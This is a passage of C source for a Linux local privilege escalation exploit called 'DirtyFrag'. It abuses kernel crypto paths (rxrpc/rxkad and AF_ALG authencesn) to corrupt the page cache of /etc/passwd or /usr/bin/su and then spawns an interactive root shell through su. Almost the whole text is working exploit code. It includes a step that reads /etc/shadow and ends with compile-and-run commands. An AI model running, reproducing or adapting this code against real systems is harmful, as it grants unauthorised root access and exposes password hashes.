     * K_C (chars 8-15 = "0:GGGGGG:" with G non-control).  All searches
     * are user-space only — no kernel/VM interaction.
     *
     * Last-write-wins ordering: trigger A first (covers 4..11), then B
     * (covers 6..13 — overrides A's 6..11), then C (covers 8..15 —
     * overrides A's 8..11 and B's 8..13).  Final state of chars 4..15:
     *   chars 4..5  = P_A[0..1]
     *   chars 6..7  = P_B[0..1]
     *   chars 8..15 = P_C[0..7]
     * =================================================================*/
    uint8_t Ca[8], Cb[8], Cc[8];
    int off_a = 4, off_b = 6, off_c = 8;
    if (pread(rfd_ro, Ca, 8, off_a) != 8) { WARN("pread Ca: %s", strerror(errno)); return 1; }
    if (pread(rfd_ro, Cb, 8, off_b) != 8) { WARN("pread Cb: %s", strerror(errno)); return 1; }
    if (pread(rfd_ro, Cc, 8, off_c) != 8) { WARN("pread Cc: %s", strerror(errno)); return 1; }

    LOG("Ca @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
            off_a, Ca[0],Ca[1],Ca[2],Ca[3],Ca[4],Ca[5],Ca[6],Ca[7],
            (Ca[0]>=32&&Ca[0]<127)?Ca[0]:'.', (Ca[1]>=32&&Ca[1]<127)?Ca[1]:'.',
            (Ca[2]>=32&&Ca[2]<127)?Ca[2]:'.', (Ca[3]>=32&&Ca[3]<127)?Ca[3]:'.',
            (Ca[4]>=32&&Ca[4]<127)?Ca[4]:'.', (Ca[5]>=32&&Ca[5]<127)?Ca[5]:'.',
            (Ca[6]>=32&&Ca[6]<127)?Ca[6]:'.', (Ca[7]>=32&&Ca[7]<127)?Ca[7]:'.');
    LOG("Cb @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
            off_b, Cb[0],Cb[1],Cb[2],Cb[3],Cb[4],Cb[5],Cb[6],Cb[7],
            (Cb[0]>=32&&Cb[0]<127)?Cb[0]:'.', (Cb[1]>=32&&Cb[1]<127)?Cb[1]:'.',
            (Cb[2]>=32&&Cb[2]<127)?Cb[2]:'.', (Cb[3]>=32&&Cb[3]<127)?Cb[3]:'.',
            (Cb[4]>=32&&Cb[4]<127)?Cb[4]:'.', (Cb[5]>=32&&Cb[5]<127)?Cb[5]:'.',
            (Cb[6]>=32&&Cb[6]<127)?Cb[6]:'.', (Cb[7]>=32&&Cb[7]<127)?Cb[7]:'.');
    LOG("Cc @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
            off_c, Cc[0],Cc[1],Cc[2],Cc[3],Cc[4],Cc[5],Cc[6],Cc[7],
            (Cc[0]>=32&&Cc[0]<127)?Cc[0]:'.', (Cc[1]>=32&&Cc[1]<127)?Cc[1]:'.',
            (Cc[2]>=32&&Cc[2]<127)?Cc[2]:'.', (Cc[3]>=32&&Cc[3]<127)?Cc[3]:'.',
            (Cc[4]>=32&&Cc[4]<127)?Cc[4]:'.', (Cc[5]>=32&&Cc[5]<127)?Cc[5]:'.',
            (Cc[6]>=32&&Cc[6]<127)?Cc[6]:'.', (Cc[7]>=32&&Cc[7]<127)?Cc[7]:'.');

    fcrypt_init_sboxes();
    /* selftest */
    {
        fcrypt_uctx ctx;
        uint8_t z[8] = {0};
        uint8_t cv[8] = { 0x0E, 0x09, 0x00, 0xC7, 0x3E, 0xF7, 0xED, 0x41 };
        uint8_t pv[8];
        fcrypt_user_setkey(&ctx, z);
        fcrypt_user_decrypt(&ctx, pv, cv);
        if (memcmp(pv, z, 8) != 0) { WARN("fcrypt selftest FAILED"); return 1; }
    }
    LOG("fcrypt selftest OK");

    uint8_t Ka[8], Pa_out[8];
    uint8_t Kb[8], Pb_out[8];
    uint8_t Kc[8], Pc_out[8];
    uint8_t Cb_actual[8], Cc_actual[8];

    {
        uint64_t max_iters = 10000000000ULL;
        const char *e = getenv("LPE_MAX_ITERS");
        if (e) max_iters = strtoull(e, NULL, 0);
        uint64_t seed_base = (uint64_t)time(NULL) * 0x100000001ULL ^ (uint64_t)getpid();
        const char *se = getenv("LPE_SEED");
        if (se) seed_base = strtoull(se, NULL, 0);

        fprintf(stderr, "\n=== STAGE 1a: search K_A (chars 4-5 := \"::\")  prob ~1.5e-5 ===\n");
        if (find_K_offline_generic(Ca, max_iters, fc_check_pa_nullok,
                    Ka, Pa_out, seed_base, "K_A") != 0) {
            WARN("K_A search exhausted"); return 2;
        }

        /* After splice A is applied, the ciphertext that splice B will
         * see at file offset 6 is NOT the original Cb — it's the bytes
         * that splice A wrote to file offsets 6..11 (= Pa[2..7]) plus
         * the original bytes 12..13 (= Cb[6..7]).  We must derive
         * Cb_actual and search K_B against it. */
        memcpy(Cb_actual, Pa_out + 2, 6);
        memcpy(Cb_actual + 6, Cb + 6, 2);
        LOG("Cb_actual (after splice A) = %02x%02x%02x%02x%02x%02x%02x%02x",
                Cb_actual[0],Cb_actual[1],Cb_actual[2],Cb_actual[3],
                Cb_actual[4],Cb_actual[5],Cb_actual[6],Cb_actual[7]);

        fprintf(stderr, "\n=== STAGE 1b: search K_B (chars 6-7 := \"0:\")  prob ~1.5e-5 ===\n");
        if (find_K_offline_generic(Cb_actual, max_iters, fc_check_pb_nullok,
                    Kb, Pb_out, seed_base ^ 0xa5a5a5a5a5a5a5a5ULL,
                    "K_B") != 0) {
            WARN("K_B search exhausted"); return 2;
        }

        /* Same chaining logic for splice C: after splice B, file offsets
         * 8..13 hold Pb[2..7]; offsets 14..15 still hold the original
         * bytes Cc[6..7]. */
        memcpy(Cc_actual, Pb_out + 2, 6);
        memcpy(Cc_actual + 6, Cc + 6, 2);
        LOG("Cc_actual (after splice B) = %02x%02x%02x%02x%02x%02x%02x%02x",
                Cc_actual[0],Cc_actual[1],Cc_actual[2],Cc_actual[3],
                Cc_actual[4],Cc_actual[5],Cc_actual[6],Cc_actual[7]);

        fprintf(stderr, "\n=== STAGE 1c: search K_C (chars 8-15 := \"0:GGGGGG:\")  prob ~5.4e-8 ===\n");
        if (find_K_offline_generic(Cc_actual, max_iters, fc_check_pc_nullok,
                    Kc, Pc_out, seed_base ^ 0x5a5a5a5a5a5a5a5aULL,
                    "K_C") != 0) {
            WARN("K_C search exhausted"); return 2;
        }
    }

    fprintf(stderr, "\n[+] Predicted post-corruption /etc/passwd line 1:\n    \"root");
    /* chars 4-5 from P_A */
    for (int i = 0; i < 2; i++) fputc((Pa_out[i]>=32&&Pa_out[i]<127)?Pa_out[i]:'.', stderr);
    /* chars 6-7 from P_B */
    for (int i = 0; i < 2; i++) fputc((Pb_out[i]>=32&&Pb_out[i]<127)?Pb_out[i]:'.', stderr);
    /* chars 8-15 from P_C */
    for (int i = 0; i < 8; i++) fputc((Pc_out[i]>=32&&Pc_out[i]<127)?Pc_out[i]:'.', stderr);
    fprintf(stderr, "/root:/bin/bash\"\n");

    /* === STAGE 2 — THREE KERNEL TRIGGERS (in order A → B → C) ===
     * Each trigger does a single in-place decrypt at the
     * indicated /etc/passwd file offset.  Last-write-wins on overlapping
     * bytes determines the final state.
     */
    fprintf(stderr, "\n=== STAGE 2a: kernel trigger A @ off %d (set chars 4-5 \"::\") ===\n", off_a);
    memcpy(SESSION_KEY, Ka, 8);
    if (do_one_trigger(rfd_ro, off_a, 8) < 0) {
        WARN("kernel trigger A failed"); return 3;
    }

    fprintf(stderr, "\n=== STAGE 2b: kernel trigger B @ off %d (set chars 6-7 \"0:\") ===\n", off_b);
    memcpy(SESSION_KEY, Kb, 8);
    if (do_one_trigger(rfd_ro, off_b, 8) < 0) {
        WARN("kernel trigger B failed"); return 3;
    }

    fprintf(stderr, "\n=== STAGE 2c: kernel trigger C @ off %d (set chars 8-15 \"0:GGGGGG:\") ===\n", off_c);
    memcpy(SESSION_KEY, Kc, 8);
    if (do_one_trigger(rfd_ro, off_c, 8) < 0) {
        WARN("kernel trigger C failed"); return 3;
    }

    /* Verify: re-read line 1 of /etc/passwd via mmap. */
    fprintf(stderr, "[*] /etc/passwd line 1 (root entry) AFTER:  '");
    for (int i = 0; i < 32; i++) {
        char c = ((const char *)map)[i];
        fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr);
    }
    fprintf(stderr, "'\n");

    /* Sanity-check: chars 4-5 = "::", 6-7 = "0:", 8-9 = "0:", 15 = ':'. */
    {
        const char *m = (const char *)map;
        int ok = (m[4] == ':' && m[5] == ':' &&
                m[6] == '0' && m[7] == ':' &&
                m[8] == '0' && m[9] == ':' &&
                m[15] == ':');
        if (!ok) {
            WARN("post-trigger sanity check failed — char layout off");
            return 4;
        }
    }
    fprintf(stderr,
            "\n[!!!] HIT — root entry now has empty passwd field, uid=0, "
            "gid=0, dir=/root, shell=/bin/bash.\n");

    /* === STAGE 3 — VERIFY VIA getent passwd root === */
    fprintf(stderr,
            "\n=== STAGE 3: independent verify via `getent passwd root` ===\n");
    {
        int p[2];
        if (pipe(p) == 0) {
            pid_t pid = fork();
            if (pid == 0) {
                close(p[0]);
                dup2(p[1], 1);
                dup2(p[1], 2);
                close(p[1]);
                execlp("getent", "getent", "passwd", "root", NULL);
                _exit(127);
            }
            close(p[1]);
            char buf[1024];
            ssize_t r = read(p[0], buf, sizeof(buf) - 1);
            close(p[0]);
            int wstatus = 0;
            waitpid(pid, &wstatus, 0);
            if (r > 0) {
                buf[r] = 0;
                fprintf(stderr, "[getent passwd root] %s", buf);
            }
            fprintf(stderr,
                    "[+] PRIMITIVE proven: root entry has empty passwd field "
                    "via NSS.\n");
        }
    }

    /* Honour `--corrupt-only` arg or DIRTYFRAG_CORRUPT_ONLY=1 env so
     * the chain wrapper can skip the in-process su PTY stage and exec
     * /usr/bin/su itself.  Avoids the flaky posix_openpt bridge. */
    {
        int co_flag = 0;
        for (int i = 1; i < argc; i++)
            if (!strcmp(argv[i], "--corrupt-only")) { co_flag = 1; break; }
        const char *e = getenv("DIRTYFRAG_CORRUPT_ONLY");
        if (e && *e == '1') co_flag = 1;
        if (co_flag) return 0;
    }

    /* === STAGE 4 — `su` (target=root, no password input) ===
     * PAM common-auth contains "auth [success=2 default=ignore]
     * pam_unix.so nullok" — so a target user with empty passwd field
     * + nullok flag accepts an empty password.  We auto-inject a
     * single newline on the "Password:" prompt and then bridge the
     * resulting bash to the user's tty. */
    fprintf(stderr,
            "\n=== STAGE 4: spawning interactive root shell via `su` "
            "(no password input needed) ===\n\n");
    fflush(stderr);

    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0) {
        WARN("posix_openpt: %s", strerror(errno));
        return 5;
    }
    char *slave_name = ptsname(master);

    struct winsize ws;
    if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0) {
        ioctl(master, TIOCSWINSZ, &ws);
    }

    pid_t pid = fork();
    if (pid < 0) { WARN("fork: %s", strerror(errno)); return 5; }
    if (pid == 0) {
        /* child */
        setsid();
        int slave = open(slave_name, O_RDWR);
        if (slave < 0) _exit(127);
        ioctl(slave, TIOCSCTTY, 0);
        dup2(slave, 0); dup2(slave, 1); dup2(slave, 2);
        if (slave > 2) close(slave);
        close(master);
        /* `su` with no args targets root.  PAM common-auth's pam_unix.so
         * nullok accepts the empty passwd we planted in /etc/passwd. */
        execlp("su", "su", NULL);
        _exit(127);
    }

    /* parent: bridge user's tty <-> master. */
    struct termios saved_termios;
    int saved_termios_ok = (tcgetattr(STDIN_FILENO, &saved_termios) == 0);
    if (saved_termios_ok) {
        struct termios raw = saved_termios;
        cfmakeraw(&raw);
        tcsetattr(STDIN_FILENO, TCSANOW, &raw);
    }

    int auto_pw_sent = 0;
    int stdin_eof = 0;          /* set when stdin closes (e.g. /dev/null) */
    char buf[4096];
    /* If LPE_AUTO_VERIFY=1 is set, the bridge will inject
     * `id; whoami; exit\n` so it can prove uid=0 non-interactively
     * (e.g. when stdin is /dev/null in CI). */
    int auto_verify = 0;
    {
        const char *e = getenv("LPE_AUTO_VERIFY");
        if (e && *e == '1') auto_verify = 1;
    }
    int verify_sent = 0;
    int total_ms = 0;
    for (;;) {
        struct pollfd pfds[2] = {
            { stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },
            { master,       POLLIN, 0 },
        };
        int pr = poll(pfds, 2, 200);
        if (pr < 0 && errno != EINTR) break;
        total_ms += 200;

        if (pfds[1].revents & POLLIN) {
            ssize_t n = read(master, buf, sizeof(buf));
            if (n <= 0) break;
            (void)write(STDOUT_FILENO, buf, n);
            if (!auto_pw_sent && (size_t)n < sizeof(buf)) {
                buf[n] = 0;
                if (strstr(buf, "Password") || strstr(buf, "password")) {
                    /* Empty password — PAM nullok will accept it.
                     * (When pam_unix sees an empty passwd field plus
                     * nullok it skips the prompt entirely; this branch
                     * handles the case where some other PAM module
                     * prints a prompt anyway.) */
                    (void)write(master, "\n", 1);
                    auto_pw_sent = 1;
                }
            }
        }
        if (!stdin_eof && (pfds[0].revents & POLLIN)) {
            ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
            if (n <= 0) {
                /* stdin EOF — stop reading from it but keep bridging
                 * master → stdout so su can still finish auth and run
                 * the optional auto-verify command. */
                stdin_eof = 1;
            } else {
                (void)write(master, buf, n);
            }
        }
        if (pfds[1].revents & (POLLHUP | POLLERR)) break;

        /* Auto-verify: ~1 s after spawn, send `id; whoami; exit\n` so
         * the bridge captures uid=0 evidence non-interactively even
         * when pam_unix's blank-passwd path skips the prompt. */
        if (auto_verify && !verify_sent && total_ms >= 1000) {
            const char cmd[] = "id; whoami; cat /etc/shadow | head -2; exit\n";
            (void)write(master, cmd, sizeof(cmd) - 1);
            verify_sent = 1;
        }

        int status;
        pid_t w = waitpid(pid, &status, WNOHANG);
        if (w == pid) {
            for (int i = 0; i < 5; i++) {
                struct pollfd pf = { master, POLLIN, 0 };
                if (poll(&pf, 1, 50) <= 0) break;
                ssize_t n = read(master, buf, sizeof(buf));
                if (n <= 0) break;
                (void)write(STDOUT_FILENO, buf, n);
            }
            break;
        }
    }
    if (saved_termios_ok) {
        tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);
    }
    close(master);
    return 0;
}
/*
 * DirtyFrag chain — uid=1000 → root.
 *
 * 1. ESP path  (authencesn AF_ALG --corrupt-only): overwrites the first
 *    160 bytes of /usr/bin/su's page-cache with a static x86_64 root-
 *    shell ELF.  Works on every distro tested regardless of PAM nullok
 *    or /etc/passwd contents — once invoked, the patched setuid-root
 *    /usr/bin/su just execs /bin/sh as uid 0.
 *
 * 2. rxrpc path  (Ubuntu fallback): if AF_ALG is sandboxed and the ESP
 *    path can't reach the page cache, fall back to the rxrpc/rxkad
 *    nullok primitive that patches /etc/passwd's root entry empty.
 *    PAM nullok then accepts the empty password during `su -`.
 *
 * 3. Once either target is corrupted, spawn `/usr/bin/su -` inside a
 *    fresh PTY and bridge the user's tty to it.  The bridge handles
 *    both the patched-su (no PAM at all) and the patched-passwd (PAM
 *    nullok) cases uniformly, and works even when the caller is in a
 *    background process group of an ssh-allocated PTY.
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <termios.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdint.h>

extern int su_lpe_main(int argc, char **argv);
extern int rxrpc_lpe_main(int argc, char **argv);

/*
 * The 8 bytes our su payload places at file offset 0x78 — the first
 * instructions of the embedded shell ELF.  Sequence:
 *   31 ff   xor edi, edi
 *   31 f6   xor esi, esi
 *   31 c0   xor eax, eax
 *   b0 6a   mov al, 0x6a   (setgid)
 * Distros' original /usr/bin/su has different bytes here, so this is
 * a reliable post-patch marker.
 *
 * (We don't check offset 0 because /usr/bin/su already has the ELF
 * magic there — both before and after we patch.)
 */
static const uint8_t su_marker[8] = {
    0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,
};

static int su_already_patched(void)
{
    int fd = open("/usr/bin/su", O_RDONLY);
    if (fd < 0)
        return 0;
    uint8_t got[8];
    ssize_t n = pread(fd, got, sizeof(got), 0x78);
    close(fd);
    if (n != sizeof(got))
        return 0;
    return memcmp(got, su_marker, sizeof(su_marker)) == 0;
}

static int passwd_already_patched(void)
{
    int fd = open("/etc/passwd", O_RDONLY);
    if (fd < 0)
        return 0;
    char head[16];
    ssize_t n = pread(fd, head, sizeof(head), 0);
    close(fd);
    if (n < 9)
        return 0;
    return memcmp(head, "root::0:0", 9) == 0;
}

static int either_target_patched(void)
{
    return su_already_patched() || passwd_already_patched();
}

static void silence_stderr(int *saved_fd)
{
    *saved_fd = dup(STDERR_FILENO);
    int dn = open("/dev/null", O_WRONLY);
    if (dn >= 0) {
        dup2(dn, STDERR_FILENO);
        close(dn);
    }
}

static void restore_stderr(int saved_fd)
{
    if (saved_fd >= 0) {
        dup2(saved_fd, STDERR_FILENO);
        close(saved_fd);
    }
}

static char **append_corrupt_only(int argc, char **argv, int *new_argc)
{
    static char *flag = "--corrupt-only";
    static char *buf[64];
    int n = argc < 60 ? argc : 60;
    for (int i = 0; i < n; i++)
        buf[i] = argv[i];
    buf[n] = flag;
    buf[n + 1] = NULL;
    *new_argc = n + 1;
    return buf;
}

static void exec_su_login(void)
{
    const char *paths[] = {
        "/bin/su", "/usr/bin/su", "/sbin/su", "/usr/sbin/su", NULL,
    };
    for (int i = 0; paths[i]; i++)
        execl(paths[i], "su", "-", (char *)NULL);
    execlp("su", "su", "-", (char *)NULL);
}

/*
 * Spawn `/usr/bin/su -` in a fresh PTY and bridge our tty to it.
 */
static int run_root_pty(void)
{
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0)
        return -1;
    if (grantpt(master) < 0 || unlockpt(master) < 0) {
        close(master);
        return -1;
    }
    char *slave_name = ptsname(master);
    if (!slave_name) {
        close(master);
        return -1;
    }

    struct winsize ws;
    if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)
        ioctl(master, TIOCSWINSZ, &ws);

    pid_t pid = fork();
    if (pid < 0) {
        close(master);
        return -1;
    }
    if (pid == 0) {
        setsid();
        int slave = open(slave_name, O_RDWR);
        if (slave < 0)
            _exit(127);
        ioctl(slave, TIOCSCTTY, 0);
        dup2(slave, 0);
        dup2(slave, 1);
        dup2(slave, 2);
        if (slave > 2)
            close(slave);
        close(master);
        exec_su_login();
        _exit(127);
    }

    signal(SIGTTOU, SIG_IGN);
    signal(SIGTTIN, SIG_IGN);
    signal(SIGPIPE, SIG_IGN);
    signal(SIGHUP,  SIG_IGN);
    (void)setpgid(0, 0);
    (void)tcsetpgrp(STDIN_FILENO, getpid());

    struct termios saved_termios;
    int restore_termios = 0;
    if (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {
        struct termios raw = saved_termios;
        cfmakeraw(&raw);
        if (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)
            restore_termios = 1;
    }

    int auto_pw_sent = 0;
    int stdin_eof = 0;
    int saw_master_output = 0;
    int total_ms = 0;
    char buf[4096];

    for (;;) {
        struct pollfd pfds[2] = {
            { stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },
            { master,                        POLLIN, 0 },
        };
        int pr = poll(pfds, 2, 200);
        if (pr < 0 && errno != EINTR)
            break;
        total_ms += 200;

        if (pfds[1].revents & POLLIN) {
            ssize_t n = read(master, buf, sizeof(buf));
            if (n <= 0)
                break;
            saw_master_output = 1;
            (void)write(STDOUT_FILENO, buf, n);
            if (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {
                buf[n] = 0;
                if (strstr(buf, "Password") ||
                        strstr(buf, "password")) {
                    (void)write(master, "\n", 1);
                    auto_pw_sent = 1;
                }
            }
        }
        if (!stdin_eof && (pfds[0].revents & POLLIN)) {
            ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
            if (n <= 0)
                stdin_eof = 1;
            else
                (void)write(master, buf, n);
        }
        if (pfds[1].revents & (POLLHUP | POLLERR))
            break;

        if (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {
            (void)write(master, "\n", 1);
            auto_pw_sent = 1;
        }

        int status;
        pid_t w = waitpid(pid, &status, WNOHANG);
        if (w == pid) {
            for (int i = 0; i < 5; i++) {
                struct pollfd pf = { master, POLLIN, 0 };
                if (poll(&pf, 1, 50) <= 0)
                    break;
                ssize_t n = read(master, buf, sizeof(buf));
                if (n <= 0)
                    break;
                (void)write(STDOUT_FILENO, buf, n);
            }
            break;
        }
    }

    if (restore_termios)
        tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);
    close(master);
    return 0;
}

int main(int argc, char **argv)
{
    int verbose = (getenv("DIRTYFRAG_VERBOSE") != NULL);
    int force_esp = 0, force_rxrpc = 0;
    int saved_err = -1;
    int rc = 1;
    int new_argc;
    char **co_argv;

    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "--force-esp"))
            force_esp = 1;
        else if (!strcmp(argv[i], "--force-rxrpc"))
            force_rxrpc = 1;
        else if (!strcmp(argv[i], "-v") ||
                !strcmp(argv[i], "--verbose"))
            verbose = 1;
    }

    if (getuid() == 0) {
        execlp("/bin/bash", "bash", (char *)NULL);
        _exit(1);
    }

    co_argv = append_corrupt_only(argc, argv, &new_argc);

    if (!verbose)
        silence_stderr(&saved_err);

    if (force_rxrpc) {
        rc = rxrpc_lpe_main(new_argc, co_argv);
        for (int i = 0; !passwd_already_patched() && i < 3; i++)
            rc = rxrpc_lpe_main(new_argc, co_argv);
    } else if (force_esp) {
        rc = su_lpe_main(new_argc, co_argv);
    } else {
        rc = su_lpe_main(new_argc, co_argv);
        if (!su_already_patched()) {
            rc = rxrpc_lpe_main(new_argc, co_argv);
            for (int i = 0; !passwd_already_patched() && i < 3; i++)
                rc = rxrpc_lpe_main(new_argc, co_argv);
        }
    }

    int patched = either_target_patched();

    if (!verbose)
        restore_stderr(saved_err);

    if (patched) {
        (void)run_root_pty();
        return 0;
    }

    dprintf(2, "dirtyfrag: failed (rc=%d)\n", rc);
    return rc ? rc : 1;
}

利用

gcc -O0 -Wall -o exp exp.c -lutil
./exp